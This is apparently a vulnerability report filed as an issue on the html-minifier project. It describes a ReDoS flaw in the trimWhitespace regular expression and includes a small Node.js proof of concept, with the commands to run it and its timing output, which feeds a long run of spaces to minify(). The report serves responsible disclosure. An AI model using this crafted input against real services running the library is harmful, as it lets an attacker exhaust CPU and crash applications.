[Security] ReDoS Vulnerability

[ready-research]

Hi team, I have reported a security issue in huntr 9 months back, but I didn't get any response https://www.huntr.dev/bounties/e98b8228-41bc-4304-afd6-256c6dfebf9e/
Please validate this issue using Mark as Valid. Thanks.

✍️ Description
A ReDoS (regular expression denial of service) flaw was found in the html-minifier. An attacker that is able to provide crafted input to the trimWhitespace function may cause an application to consume an excessive amount of CPU.

html-minifier/src/htmlminifier.js

Line 12 in e15a892

return str && str.replace(/^[ \n\r\t\f]+/, '').replace(/[ \n\r\t\f]+$/, '');

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept
Create the following poc.js

// PoC.js
var htmlMinifier = require("html-minifier")
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}

var time = Date.now();
htmlMinifier.minify(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);

Execute the following command in another terminal:

npm i html-minifier
node poc.js

Check the Output:

time_cost: 3794

Ideally, the time cost should be 1-10 milliseconds.

💥 Impact
This vulnerability is capable of exhausting system resources and leading to crashes.